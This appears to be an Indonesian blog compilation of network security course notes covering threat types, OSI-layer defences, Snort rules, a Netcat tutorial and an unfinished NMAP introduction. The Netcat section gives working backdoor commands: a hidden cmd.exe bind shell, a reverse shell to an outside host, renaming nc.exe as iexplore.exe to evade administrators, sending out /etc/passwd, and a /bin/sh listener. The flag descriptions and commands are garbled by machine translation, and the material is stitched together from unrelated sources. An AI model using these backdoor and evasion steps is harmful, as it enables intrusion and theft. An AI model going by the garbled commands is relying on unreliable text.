Sistem Keamanan Jaringan

 Keamanan jaringan 


Definisi Sistem Keamanan Jaringan

Sistem keamanan jaringan adalah proses untuk mengidentifikasi dan mencegah pengguna yang tidak sah dari suatu jaringan komputer. Tujuannya tentu saja untuk mengantisipasi resiko ancaman berupa perusakan bagian fisik komputer maupun pencurian data seseorang.

 

Jenis Gangguan Keamanan Jaringan

Ada beberapa jenis gangguan keamanan jaringan yang perlu Anda ketahui. Berikut daftarnya:

  • Hacking: perusakan pada infrastruktur jaringan komputer yang sudah ada.
  • Carding: pencurian data terhadap identitas perbankan seseorang. Misalnya pencurian nomor kartu kredit yang dimanfaatkan untuk berbelanja online.
  • Deface: perubahan terhadap bentuk atau tampilan website.
  • Physing: pemalsuan data resmi.

Macam-macam Sistem Keamanan Jaringan

  1. VPN (Virtual Private Network): jaringan komunikasi lokal yang dapat terhubung melalui media jaringan. Fungsi dari VPN secara tersendiri adalah untuk mendapatkan komunikasi yang aman melalui internet.
  2. Autentikasi: proses pengenalan peralatan, sistem operasi, aplikasi, dan identitas pengguna yang terhubung dengan jaringan komputer. Contohnya adalah saat pengguna memasukkan username dan password untuk login ke jaringan.
  3. DMZ (De-Militerized Zone): berfungsi untuk melindungi sistem internal dari serangan hacker.
  4. Enkripsi: teknik pengkodean data yang dapat digunakan untuk menjaga data.

 

Tips Keamanan Jaringan

Untuk menjaga keamanan jaringan Anda, ikuti tips berikut ini:

  1. Pasang AntiVirus yang sesuai dengan kebutuhan Anda yang fungsinya untuk mencegah berbagai macam virus komputer yang dapat merusak komputer dan menghilangkan data-data penting.
  2. Update komputer Anda secara rutin. Software yang terinstal pada komputer perlu untuk diperbarui demi menjaga keamanan komputer Anda.
  3. Jangan sembarangan membuka website yang tidak jelas, seperti situs-situs bajakan yang didalamnya terdapat virus pathogen yang dapat menyebar ke perangkat komputer.
  4. Anda juga sebaiknya berhati-hati saat ingin mengunduh file dari internet, karena bisa jadi juga terdapat virus atau malware didalamnya.

 Demikianlah informasi seputar sistem keamanan jaringan yang berguna untuk melindungi perangkat komputer Anda. Waspadalah saat menggunakan komputer dan mengakses internet karena kini banyak orang-orang yang melakukan kejahatan secara digital.


Aspek Utama Keamanan Jaringan

  1. Convidentiality / Privacy : usaha untuk menjaga informasi dari orang yang tidak berhak mengakses. Privacy lebih ke arah data-data yang sifatnya privat sedangkan Convidentiality biasanya berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu ( misalnya sebagai bagian dari pendaftaran sebuah servis ) dan hanya diperbolehkan untuk keperluan tertentu tersebut. Contoh hal  yang berhubungan dengan privacy adalah e-mail seorang pemakai ( User ) tidak boleh di baca administrator. contoh confidential Information adalah data-data yang sifatnya pribadi  (Seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah di derita, nomor kartu kredit, dsb) merupakan data-data yang ingin di proteksi penggunaan dan penyebarannya. contoh lain dari Convidentiality adalah data pelanggan dari sebuah Internet Service Provider ( ISP ). serangan terhadap aspek privacy misalnya adalah usaha untuk melakukan penyadapan  (dengan program sniffer ). Usaha usaha yang dapat dilakukan untuk meningkatkan Privacy dan Convidentiality adalah dengan menggunakan teknologi Kriptografi.
  2. Integrity : Aspek ini menekankan bahwa informasi tidak boleh di ubah tanpa seijin pemilik informasi. Adanya virus, trojan horse / pemakai lain yang mengubah informasi tanpa ijin merupakan contoh masalah yang harus di hadapi. sebuah e-mail dapat saja “ditangkap” ( Intercept ) di tengah jalan, di ubah isinya, kemudian diteruskan ke alamat yang di tuju. dengan kata lain, integritas dari informasi sudah tidak terjaga. penggunaan enskripsi dan digital signature, misalnya dapat mengatasi masalah ini. salah satu contoh kasus trojan horse adalah distribusi paket program TCP Wrapper ( yaitu program populer  yang dapat di gunakan untuk mengatur dan membatasi akses TCP/IP ) yang di modifikasi oleh orang yang tidak bertanggunhg jawab.
  3. Availability : Aspek Availability / ketersidaan berhubungan dengan ketersediaan informasi ketika di butuhkan.  sistem informasi yang diserang / di jebol dapat menghambat / meniadakan akses ke informasi. Contoh hambatan adalah serangan yang sering di sebut dengan “denial of service attack” ( DoS attack ), dimana server dikirim permintaan  ( biasanya palsu ) yang bertubi-tubi / permintaan yang di luar perkiraan sehingga tidak dapat melayani permintaan lain / bahkan sampai down, hang, crash. contoh lain adalah adanya mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi dengan ukuran besar sehingga sang pemakai tidak dapatmembuka e-mailnya atau kesulitan mengakses e-mailnya.
  4. Non-Repudiation : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi . sebagai contoh, seseorang yang mengirimkan e-mail untuk memesan barang tidak dapat menyangkal bahwa dia telah mengrimkan e-mail tersebut. Aspek ini sangat penting dalam hal electronic commerce. penggunaan digital signature dan teknologi kriptografi secara umum dapat menjaga aspek ini. akan tetapi hal ini masih harus di dukung oleh hukum sehingga status dari digital signature itu  jelas legal.
  5. Authentication : Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli / orang yang mengakses / memberikan informasi adalah betul-betul orang yang di maksud. Maslah pertama, membuktikan keaslian dokumen dapat dilakukan dengan teknologi watermarking dan digital signature. watermarking juga dapat digunakan untuk menjaga “intelectual property”, yaitu dengan menandai dokumen / hasil karya denagan “tanda tangan” pembuat. Masalah kedua biasanya berhubungan denga access control, yaitu berkaitan denga pembatasan orang yang dapat mengakses informasi. dalam hal ini pengguna harus menujukkan bukti bahwa memang dia adalah pengguna yang sah, misalnya dengan menggunakan password  , biometric, dan sejenisnya. penggunaan teknologi smart card saat ini kelihatannya dapat meningkatkan keamanan aspek ini.
  6. Acces Control : Aspek ini berhubungan dengan cara pengaturan akses kepada informasi. hal ini biasanya berhubungan dengan masalah Authentication dan juga Privacy. Access control seringkali dilakukan dengan menggunakan kombinasi user id / password atau denga menggunakan mekanisme lain.
  7. Accountability : adalah pembatasan akses untuk memasuki beberapa lokasi. Proses Access Control ditujukan untuk memastikan bahwa hanya orang-orang yang berwenang dan punya alasan yang absah, terkait dengan operasi dan bisnis, mendapatkan ijin, dan memahami dan memenuhi persyaratan yang ditentukan untuk masuklah yang dapat memasuki dan/atau bekerja di dalam fasilitas. Hal ini dimaksudkan agar keselamatan dan keamanan fasilitas, dan orang-orang yang berada di dalamnya dapat terjamin.

Ancaman-Ancaman pada Keamanan Jaringan Komputer

  1. 1. ANCAMAN-ANCAMAN PADA KEAMANAN JARINGAN KOMPUTER Tugas Mata Kuliah Administrasi dan Keamanan Jaringan Muhammad Fajar Said Husainy TK 101021 Teknik Komputer D3 Semester-5 Politeknik TEDC Bandung 1 Desember 2012
  2. 2. Ancaman keamanan jaringan komputer adalah pengacauan, penyusupan atau serangan-serangan lainnya pada infrastruktur jaringan untuk menganalisa jaringan dan memperoleh informasi secepatnya, lalu membuat jaringan menjadi hancur atau rusak. Dalam kebanyakan kasus, penyerang tidak hanya tertarik dalam memanfaatkan perangkat lunak, tapi juga mencoba untuk mendapatkan akses tidak sah menuju perangkat jaringan. Perangkat jaringan yang tidak terpantau merupakan sumber utama kebocoran informasi dalam sebuah organisasi yang menggunakan jaringan komputer.
  3. 3. Ancaman dapat berupa manusia, objek, atau kejadian yang jika tercapai dapat berpotensi menyebabkan kerusakan pada jaringan. Juga dapat berupa malicious, seperti modifikasi informasi sensitif yang disengaja, atau bisa juga kecelakaan seperti kesalahan dalam perhitungan, atau penghapusan file yang tidak disengaja. Selain itu ancaman dapat juga dari peristiwa alam, seperti banjir, angin, kilat dan lainnya. Ada tujuh jenis serangan yang akan dibahas, yaitu: 1. Spoofing, 2. Sniffing, 3. Mapping, 4. Hijacking, 5. Trojans, 6. Denial of Service Attack (DoS) dan Distributed Denial of Service Attack (DDoS), 7. Social Engineering.
  4. 4. Semua perangkat yang terkoneksi ke internet perlu mengirimkan datagram IP kepada jaringan. Jika penyerang mendapat kendali atas perangkat lunak yang berjalan pada perangkat jaringan, mereka dapat dengan mudah memodifikasi protokol perangkat dan menyimpan alamat IP sewenang-wenang kepada alamat sumber paket data. Membuat setiap muatan terlihat seperti datang dari banyak sumber. Dengan alamat IP yang ter-Spoof, sulit untuk menemukan induk yang sebenarnya mengirim datagram tersebut.
  5. 5. Tindakan balasan untuk spoofing adalah ingress filtering. Router biasanya menjalankan tugas ini. Router yang menjalankan ingress filtering mengecek alamat IP datagram yang datang dan menentukan apakah alamat sumber dapat dicapai via interface tersebut. Jika alamat sumber tidak dapat dicapati, maka paket-paket itu akan dibuang.
  6. 6. Sniffing adalah pemotongan paket data yang melintasi sebuah jaringan. Seorang Program Sniffer, bekerja pada lapisan ethernet dalam gabungan bersama Network Interface Cards (NIC) untuk menangkap semua lalu lintas yang berjalan dari/menuju situs internet pusat. Sniffer yang menempatkan diri di semua perangkat backbone, hubungan antar-jaringan dan titik kesatuan jaringan, akan mampu memantau seluruh lalu lintas. Packet Sniffer adalah pasif, mereka mendengar semua frame lapisan data yang melewati perangkat jaringan. Tindakan balasan terbaik adalah, enkripsi end-to end atau user-to-user.
  7. 7. Sebelum menyerang sebuah jaringan, penyerang ingin mengetahui alamat IP dari perangkat-perangkatnya, sistem operasi yang digunakan, dan layanan yang ditawarkan. Dengan informasi ini, serangan dapat lebih difokuskan dengan resiko yang kecil. Proses penggalian informasi ini dikenal dengan mapping (pemetaan). Kebanyakan komunikasi jaringan terjadi dalam sebuah bentuk yang tidak aman, membuat penyerang yang telah memiliki akses menuju data dalam jaringan untuk mendengarkan lalu lintas jaringan. Tindakan balasannya adalah layanan enkripsi kuat yang hanya berdasarkan kriptografi.
  8. 8. Hijacking (pembajakan) adalah sebuah teknik yang mengambil keuntungan dari kelemahan dalam stack protokol TCP/IP. Hijacking terjadi ketika seseorang diantara dua orang yang sedang berkomunikasi, secara aktif memantau, menangkap dan mengendalikan komunikasinya. Ketika komputer berkomunikasi pada lapisan jaringan tingkat rendah, komputer mungkin tidak mampu untuk memperkirakan dengan siapa mereka saling bertukar data. Hijacking juga disebut dengan serangan Man-in-the-Middle (MITM).
  9. 9. Trojan adalah program yang terlihat seperti perangkat lunak biasa, tetapi sebenarnya melakukan tindakan jahat dan yang tidak diharapkan secara dibalik layar ketika dijalankan. Kebanyakan Spyware adalah program jenis ini. Jumlah teknik Trojan hanya terbatas pada imajinasi si penyerang. Yang sudah terkena Trojan, akan tampak beroperasi dan terlihat sebagaimana file biasa. Satu-satunya perlindungan adalah pemakaian awal dari cryptographic checksum atau prosedur binary digital signature.
  10. 10. Denial of Service Attack (DoS) merupakan serangan internet khusus yang ditujukan kepada Website besar. Serangan dirancang untuk membuat jaringan jatuh dengan membanjirinya lalu lintas yang tidak berguna. DoS dapat merusak, ketika sebuah sistem seperti Server Web telah dibanjiri oleh permintaan palsu, hingga membuatnya tidak mungkin untuk merespon permintaan asli.
  11. 11. Serangan Distributed Denial of Service Attack (DDoS) terjadi ketika banyak sistem yang telah bersepakat atau banyak penyerang membanjiri bandwidth atau sumber sasaran dengan lalu lintas yang tidak berguna. Dalam DDoS, penyerang memperoleh akses ke banyak akun pengguna melalui internet, kemudian memasang dan menjalankan program remot pada setiap situs yang terkuasai, kemudian dengan secara tenang, programprogram remot tersebut menunggu perintah dari program utama. Program utama kemudian mengontak program remot dan menginstruksikan tiap-tiapnya untuk melancarkan serangan DDoS langsung pada sasaran.
  12. 12. Social Engineering adalah penggunaan bujukan atau penipuan untuk memperoleh akses pada sistem informasi. Perantaranya biasanya sebuah telepon atau pesan E-Mail. Maksud utama dibalik Social Engineering adalah untuk menempatkan unsur manusia dalam pelanggaran jaringan dan menggunakannya sebagai senjata. Unsur manusia telah ditunjukkan sebagai hubungan terlemah dalam keamanan jaringan.

TEKNIK PENYEDIAAN LAYANAN JARINGAN

Internet Network Provider (INP), yaitu penyedia layanan jaringan menuju ke global Internet, contoh INP adalah Indosat.
Internet Service Provider (ISP), yaitu sebuah perusahaan yang memberikan akses Internet, seperti website dan virtual hosting. Contoh ISP adalah Telkomnet Instan, Indosatnet, dan Wasantara.
Internet Content Provider (ICP), yaitu penyedia layanan jasa dalam pembuatan halaman web, penyajian informasi ke portal bahkan membuat situs web. Contoh ICP adalah GudegNet, Dapurweb, dan Interaktif.
Ada tiga cara layanan yang diberikan oleh ISP untuk terhubung ke Internet, diantaranya:
Dial-up (Saluran Telepon Rumah) yaitu cara termudah untuk menghubungkan komputer ke Internet dengan menggunakan saluran telepon rumah (dial-up). Kita harus memiliki modem yang terhubung dengan saluran telepon serta telah terdaftar ke ISP, misalnya Telkomnet Instan. Kelebihan koneksi Internet ini adalah jaringan luas. Namun, kekurangannya adalah harga yang masih relatif mahal, kecepatan kurang stabil, sangat bergantung pada beban percakapan jaringan telepon, dan mobilitas hanya di satu tempat saja.
Teknologi ADSL (Asymetric Digital Subscriber Line) yaitu teknologi yang memungkinkan saluran telepon biasa digunakan untuk nmelewatkan sinyal digital dengan kecepatan tinggi untuk mengirimkan data. Teknolohi ini memberikan kecepatan akses Internet untuk perorangan atau perusahaan. Kelebihannya adalah sambungan tidak akan terganggu walaupun ada telepon masuk atu keluar. Namun, kekurangannya adalah harga relatif mahal dan belum bisa tersedia di seluruh daerah.
Wireless atau Wi-Fi (Wireless Fidelity) yaitu jaringan tanpa kabel yang menggunakan gelombang elektromagnetik frekuensi tinggi sebesar 2,4 GHz, dengan kecepatan akses Internet cepat sebesar 11 Mbps karena tidak menggunakan kabel (nirkabel).

Keamanan pada OSI Layer



Physical Layer
Disini tempat pengolahan data dan pengiriman. Pengirimannya bisa menggunakan media kabel (wired) maupun tanpa kabel (wireless). Setiap informasi yang sekiranya sangat FATAL jika diketahui orang lain, lebih baik JANGAN menggunakan media Wireless, karena kemungkinan besar orang lain bisa malakukan penyadapan informasi jika tidak di-enkripsi dengan baik.

Kelemahan dan serangan yang mungkin terjadi:

Kabel dirusak, sehingga kita tidak bisa melakukan pertukaran informasi dengan orang lain
Menyadap kabel, sehingga dapat membaca trafik (Information Leakage)
Menyadap kabel, sehingga dapat menggunakan sumber daya jaringan (Illegitimate Use)
Menyadap kabel, sehingga dapat menyuntikkan trafik atau mengambil trafik (Integrity Violation)
Penanganan serangan :

Mengamankan Trunking
Menggunakan electromagnetic shielding
DATA LINK
Kita harus melindungi Switch dengan media kabel, dan Access Point. Karena ini adalah titik akses jaringan pada layer ini

Mengamankan titik akses ini bisa menggunakan : 

Protokol 802.1x : Dapat meng-otentikasi pengguna dari peralatan yang akan melakukan hubungan dengan titik akses
Mac Address Authentication : Setiap peralatan jaringan komputer disertai dengan identitas yang unik dan dapat dikenali. Dengan identitas ini ditentukan otorisasi suatu komputer melalui proses penyaringan (filtering). Kelemahan dari sistem ini orang lain bisa memanipulasi dengan mengganti Mac nya dengan Mac orang lain yang memiliki otoritas/kewenangan (Baca : Mac Changer)
Serangan yang mungkin terjadi :

Mac Flooding : Perangkat malicious terhubung dengan switch, dan mengirimkan banyak data sekaligus dan menyebabkan switch penuh, dan akhirnya switch menolak semua data, koneksi ini berarti switch berfungsi seperti hub
Bagaimana cara mengamankan dari serangan Mac Flooding? Penanganannya Switch diatur agar bisa membatasi user hanya bisa mengirimkan berapa banyak data dalam satu waktu. Nanti gue bakalan praktekin gimana caranya, InsyaAllah…..

NETWORK
Pada bagian ini, keamanan lebih difokuskan pada IP dan Port, karena setiap data yang melewati layer ini mengandung IP dan Port yang digunakan oleh pengirim serta alamat IP dan Port dari tujuan paket tersebut. Perangkat pada layer ini adalah Router

Serangan yang mungkin terjadi:

Denial of Service threat.
Attacker dapat melakukan konfigurasi ulang pada Router dan mengubah konfigurasinya
Attacker merusak tabel routing dan mengirim update yang salah
Langkah penanganan:

Menggunakan firewall
Menggunakan password yang unik, menghindari password berupa nama, nomor telepon, tanggal, dan kata-kata yang mungkin mudah ditebak menggunakan metode Bruteforce. 
Kombinasi huruf, angka dan simbol pada password. Contoh passwod: b3L4j4RC1SC0!
Rutin mengganti password, setidaknya satu bulan sekali atau seminggu sekali
TRANSPORT
Pada bagian ini kita harus mengamankan informasi data yang dikirim setiap user. Contoh kasus adalah saat kita akan bertransaksi online dengan menyertakan kartu kredit, jika tidak ada enkripsi, Attacker dapat mendapatkan informasi kartu kredit dengan mudah.

Saya akan membahas TLS (Transport Layer Security) dan SSL (Secure Socket Layer) :

TLS : Beroperasi diatas lapisan TCP, dan menggunakan API (Application Popular Interface) untuk TCP. TLS berada di antara Aplikasi dan Transport, protokol Transport bertindak sebagai lapisan TCP dan ditingkatkan keamanannya
SSL : Digunakan hampir semua transaksi online menggunakan ini, karena menjamin kerahasian, karena menggunakan kriptografi yang cukup rumit
SESSION
Pada layer ini tugasnya adalah:

Mengkoordinasi jalannya komunikasi antar sistem
Melakukan proses pembentukan, pengelolaan dan pemutusan session antar system aplikasi
Mengendalikan dialog antar device atau nodes
Ancaman pada layer ini adalah Denial Of Services

PRESENTATION

APPLICATION
Menggunakan SSL

SNORT

Snort adalah sebuah software yang berguna untuk mengamati aktivitas dalam suatu jaringan komputer. Snort dapat digunakan sebagai suatu Network Intrusion Detection System (NIDS) yang berskala ringan (lightweight).

Cara Kerja Snort

Gambar 1: Cara Kerja Snort
Cara Kerja Snort 

Komponen – komponen Snort IDS (Intrusion Detection System) meliputi :

-Rule Snort : database yang berisi pola – pola serangan berupa signature jenis -jenis serangan. Rule snort harus selalu terupdate secara rutin agar ketika ada suatu teknik serangan yang baru, serangan tersebut dapat terdeteksi.
-Snort Engine : program yang berjalan sebagai daemon proses yang selalu bekerja untuk membaca paket data dan kemudian membadingkan dengan Rule Snort.
-Alert : catatan serangan pada deteksi penyusupan. Jika Snort engine mendeteksi paket data yang lewat sebagai sebuah serangan, maka snort engine akam mengirimkan alert berupa log file. Kemudian alert tersebut akan tersimpan di dalam database.

Cara Menuliskan Rule pada Snort

Contoh penulisan rule snort :

var LOG_IP 100.10.12.13
alert tcp $LOG_IP any -> any any (msg: “Akses Dari Dia”; sid:1;)

File konfigurasi di atas menyebabkan Snort menghasilkan alert dalam file bernama alert setiap kali IP 100.10.12.13 melakukan akses TCP, dengan pesan berupa “Akses Dari Dia”. Variabel $LOG_IP dapat digunakan dengan mensubstitusikannya menggunakan nilai yang sesungguhnya.

Contoh Lain

alert tcp any any -> any any (content:”www.facebook.com”; msg:”Someone is visiting Facebook”;sid:1000001;rev:1;)
alert tcp any any -> any any (msg:”TCP Traffic”;sid:1000002;rev:0;)

Keterangan : any any (host port)
Bagaimana cara menampilkan event/serangan pada Snort ?
Untuk menjalankan snort dapat menggunakan perintah di bawah ini:
#snort –v
#snort –vd
#snort –vde
#snort –v –d –e

dengan menambahkan beberapa switch –v, -d, -e akan menghasilkan beberapa keluaran yang berbeda, yaitu :
-v, untuk melihat header TCP/IP paket yang lewat.
-d, untuk melihat isi paket.
-e, untuk melihat header link layer paket seperti ethernet header.
 
Bagaimana cara menyimpan event dalam database ?
Perintah yang digunakan untuk mencatat paket yang lewat adalah :
./snort –dev –l ./log
./snort –dev –l ./log –h 172.10.100.10/24
./snort –dev –l ./log –b

Keterangan

  • Perintah yang paling penting untuk me-log paket yang lewat adalah -l ./log yang menentukan bahwa paket yang lewat akan di log / di catat ke file ./log.
  • Perintah –h 172.10.100.10/24 menunjukan bahwa yang di catat hanya packet dari host mana saja
  • Perintah –b memberitahukan agar file yang di log dalam format binary, bukan ASCII.
  • Untuk membaca file log dapat dilakukan dengan menjalankan snort dengan di tambahkan perintah –r nama file log-nya, seperti :
    ./snort –dv –r packet.log
    ./snort –dvr packet.log icmp

Netcat
Netcat adalah sebuah utiliti yang digunakan untuk berbagai hal yang berkaitan dengan
protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paketpaket
UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.
Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi originalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).

FiturnyaFitur dari Netcat antara lain adalah:

* Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
* Dapat membaca argumen pada command line dari standar input
* Full DNS forwarding/reverse checking
* Kemampuan untuk menggunakan any local source port
* Kemampuan menggunakan any locally-configured network source address
* Tersedia port scanning secara built-in
* Dan lain-lain


Dengan fitur² diatas banyak pengelola system memanfaatkannya untuk melakukan hal-hal kurang lebihnya seperti berikut ini :
* Scanning port dan menginventori service-service yang terpasang pada server
* File transfer
* Pengujian dan simulasi terhadap server
* Pengujian terhadap firewall, proxy dan gateway
* Pengujian performance network
* Pengujian address spoofing
* Banner grabbing

Instalasi Netcat

Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tools/network_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda.
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download,
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat

Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt.



Port Scanning

Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka.
Banner Grabbing

Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Baris Perintah

-D Menempatkan netcat dalam mode siluman. Oleh karena itu berjalan di latar belakang. Perintah ini hanya tersedia pada windows.
-E <command> Jika dikompilasi menjadi pilihan GAPING_SECURITY_HOLE, sebuah netcat mendengarkan akan mengeksekusi <command> setiap saat seseorang membuat koneksi pada port yang itu mendengarkan
-I <seconds> ini adalah interval penundaan. Ini adalah jumlah waktu netcat menunggu antara data mengirimkan.
-G <route-list> Netcat mendukung routing longgar.
-G <hop-pointer> Pilihan ini memungkinkan Anda untuk mengontrol ip di rute-list Anda hop berikutnya.
-L ini adalah mendengarkan mode.
-L ini adalah mode mendengarkan kuat hanya availiable di windows. Ini memberitahu Netcat untuk memulai kembali modus Dengar nya dengan opsi baris perintah yang sama setelah sambungan ditutup
-N Menceritakan netcat untuk tidak melakukan pencarian nama host.
-O <hexfile> Apakah hex dump pada data dan menyimpannya dalam hexfile.
-P <port> Menentukan pelabuhan
-R Netcatchooses port lokal dan remote acak.
SSpecifies-ip alamat sumber netcat harus digunakan saat membuat koneksi nya.
-T Jika dikompilasi dengan opsi telnet netcat akan dapat menangani negosiasi dengan server telnet telnet.
-U Menceritakan netcat menggunakan UDP, bukan TCP.
-V verbose. Mengontrol berapa banyak netcat akan memberitahu Anda apa its lakukan.
-W <seconds> Kontrol berapa lama netcat akan menunggu sebelum membatalkan koneksi.
-Z Menceritakan netcat untuk hanya mengirim data yang cukup untuk menemukan port mana yang mendengarkan dalam kisaran tertentu Anda.
Pemakaian
Netcat Backdoor
Korban:
nc-L-d-p <port>-t-e cmd.exe
-L adalah perintah mendengarkan. -D memberitahu netcat untuk tidak membuka jendela ketika berjalan. -P memberikan port. -T adalah untuk telnet. -E mengaktifkan cmd.exe ketika klien terhubung secara
Klien:
nc-v <ip alamat victim>
catatan: Dalam contoh ini netcat berjalan di latar belakang pada mesin korban. Sebuah sistem admin bisa membuka task manager dan melihat bahwa nc.exe sedang berjalan. Seorang hacker pintar akan mengubah nc.exe untuk sesuatu seperti iexplorer.exe atau updatemanager.exe untuk menghindari suspiscion.
Sekarang, jika seorang sistem administrator menjalankan perintah netstat-a-n terpercaya di DOS prompt, ia mungkin melihat bahwa ada sesuatu yang berjalan pada port yang agak aneh, telnet ke port tersebut, dan menemukan trik. Namun, Windows menggunakan port acak beberapa untuk berbagai alasan dan output netstat dapat memakan waktu untuk mengurai, terutama pada sistem
dengan banyak aktivitas. Hacker mungkin akan mencoba pendekatan yang berbeda.
Jika mereka telah menyusup ke server Citrix, misalnya, diakses oleh beberapa pengguna yang berselancar di Web, Anda akan mengharapkan untuk melihat banyak Domain Name System ( DNS) lookup dan koneksi Web. Menjalankan netstat-a-n akan mengungkapkan beban keluar port TCP 80 koneksi. Alih-alih memiliki sebuah instance dari netcat mendengarkan pada kotak Windows dan menunggu untuk koneksi,
untuk contoh lain Netcat mendengarkan pada kotak remote pada port 80. Di ujung sana, hacker akan menjalankan: nc-l-p 80 Dari kotak Windows, hacker cerdik bisa “menyembunyikan” Netcat dan mengeluarkan perintah ini:
mkdir C: \ Windows \ System32 \ Drivers \ q
move nc.exe C: \ Windows \ System32 \ Drivers \ q \ iexplore.exe
cd Windows \ System32 \ Drivers \ q
WINDOWS \ System32 \ DRIVER \ q> iexplore.exe
Cmd line:-d-e cmd.exe originix 80
WINDOWS \ System32 \ DRIVER \ q>
Sekarang Netcat mendengarkan harus mengambil perintah shell dari mesin Windows. Hal ini dapat melakukan pekerjaan yang lebih baik menyembunyikan backdoor dari administrator sistem. Pada pandangan pertama, koneksi hanya akan terlihat seperti Internet Explorer membuat koneksi HTTP biasa. Kerugian hanya untuk hacker adalah bahwa setelah mengakhiri shell, tidak ada cara restart itu di sisi Windows.
port Scanning
Perintah:
nc-z-w2 <IP Address> 1-6000
-Z memberitahu netcat untuk menjalankan scan port. -W2 memberitahu netcat menunggu selama 2 detik sebelum memutuskan. 1-6000 adalah port untuk memindai. Jika mau, Anda bisa menambahkan-v atau-vv untuk melihat lebih dari apa yang sedang terjadi sehingga:
nc-vv-z-w2 <IP Address> 1-6000
Banner grabbing
Banner grabbing adalah fungsi yang membantu Anda melihat apa yang berjalan di belakang port tertentu.
Command:
nc <IP Address> 80
Command:
GET HTTP
or
HEAD / HTTP/1.0
File Transfer
Dari sistem di mana file disimpan:
nc-l-u-p 55555 <file_we_want>
Command of receiving system::
nc-u-targethost 55555> copy_of_file
Ini dapat digunakan untuk meraih etc / passwd. Hal ini dapat dilakukan dengan memanfaatkan perintah
nc-l-u-p 55555 </ etc / passwd
Netcat melakukan transfer file di bawah radar. Ini tidak meninggalkan log lain apapun. FTP lainnya melakukan log cuti.
Setting a Trap
Anda bisa menjalankan instance dari netcat pada port hacker dapat mengharapkan untuk menemukan kerentanan. Jika baik Anda, Anda mungkin dapat menjebak hacker menggunakan sesuatu seperti perintah:
nc-l-v-e fakemail.pl-p 25 >> traplog.txt
skrip fakemail mungkin menggemakan beberapa output untuk memberitahu dunia itu berjalan versi sendmail dan praktis mengemis sebuah kanak-kanak script untuk datang hack. Setelah dia lakukan Anda bisa membanjiri dia dengan apa yang pernah Anda inginkan. Jika bagus, Anda bisa menjalankan script untuk ambil IP-nya.
Linux Backdoor
Sebagian besar tutorial ini dibangun di sekitar jendela hacking dengan netcat. Namun, yang sama dapat dilakukan pada sistem Linux dengan perintah:
nc-u-l-p 55555-e / bin / sh nc


NMAP

Pengertian NMAP

NMAP adalah singkatan dari Network Mapper yang merupakan sebuah tool atau alat yang bersifat open source. Alat ini hanya digunakan secara khusus untuk eksplorasi jaringan serta melakukan audit terhadap keamanan dari jaringan. Seseorang yang berjasa mengukirkan namanya sebagai penemu atau pencipta dari NMAP adalah Gordon Lyon. Ia berhasil membuat alat ini pada tanggal 1 September 1997 yang kemudian ia publikasikan melalui sebuah website yang memang menyediakan beragam artikel yang berkaitan dengan keamanan komputer.

Sebenarnya Gordon Lyon memiliki nama lain yang lebih dikenal dalam dunia perusahaan, yaitu Fydor Vaskovich. Sekedar informasi bahwa orang ini merupakan seorang yang sudah ahli dalam hal-hal yang berkaitan dengan keamanan komputer, penulis, dan juga merupakan seorang programmer open source. Selain menjadi seorang yang mengembangkan NMAP, Gordon juga diketahui merupakan pendiri dari Honeynet Project.

Sekedar informasi bahwa Honeynet Project merupakan sebuah organisasi yang bertugas melakukan riset tentang semau hal yang berkenaan denegan jaringan komputer. Sekarang NMAP sudah semakin berkembang dengan penambahan berbagai macam fitur yang membuat aplikasi ini semakin canggih.

Berikut ini kami sudah memiliki berbagai macam informasi lainnya yang masih ada kaitannya dengan NMAP. Informasi ini sangat berguna bukan hanya untuk orang awam yang belajar NMAP, melainkan untuk Anda yang sudah berpengalaman pun juga disarankan membaca informasi ini.

Fungsi NMAP

Pengertian NMAP dan Fungsinya

beberapa fungsi yang dimiliki oleh NMAP.

1. Digunakan untuk memeriksa jaringan

Fungsi NMAP yang pertama adalah sebagai alat untuk melakukan pengecekan pada jaringan. NMAP bisa digunakan untuk melakukan pengecekan terhadap jaringan besar dalam waktu yang singkat. Meskipun begitu, NMAP juga mampu bekerja pada host tunggal. Cara kerjanya adalah dengan menggunakan IP raw yang berfungsi untuk menentukan mana host yang tersedia di dalam jaringan.

